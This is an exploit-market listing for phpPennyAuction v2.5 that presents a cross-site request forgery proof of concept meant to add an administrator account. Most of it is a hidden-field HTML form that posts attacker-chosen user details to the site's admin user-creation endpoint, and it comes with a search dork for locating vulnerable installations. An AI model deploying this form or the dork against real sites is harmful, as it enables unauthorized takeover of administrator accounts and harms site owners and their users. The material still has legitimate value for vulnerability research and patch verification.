[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpPennyAuction v2.5 CSRF Vulnerability (Add Admin)

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Low
]
0day-ID
0day-ID-18406
Category
web applications
Date add
01-06-2012
Platform
php
phpPennyAuction v2.5 CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.phppennyauction.com/
.:. Tested On Demo : http://www.phppennyauctiondemo.com/
.:. Dork           : "Powered by phpPennyAuction"
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SiTE/admin/users/add">
<input type="hidden" name="_method" value="POST"/>
<input type="hidden" name="data[User][id]" value=""/>
<input type="hidden" name="data[User][username]" value="Admin"/>
<input type="hidden" name="data[User][first_name]" value="Mohamad"/>
<input type="hidden" name="data[User][last_name]" value="Hussien"/>
<input type="hidden" name="data[User][email]" value="F.Hack@w.cn"/>
<input type="hidden" name="data[User][date_of_birth][month]" value="5"/>
<input type="hidden" name="data[User][date_of_birth][day]" value="17"/>
<input type="hidden" name="data[User][date_of_birth][year]" value="1991"/>
<input type="hidden" name="data[User][phone_number]" value="...."/>
<input type="hidden" name="data[User][gender_id]" value="1"/>
<input type="hidden" name="data[User][tax_number]" value="...."/>
<input type="hidden" name="data[User][newsletter]" value="0"/>
<input type="hidden" name="data[User][admin]" value="0"/>
</form>

</body>
</html>
####################################################################



#  0day.today [2024-12-27]  #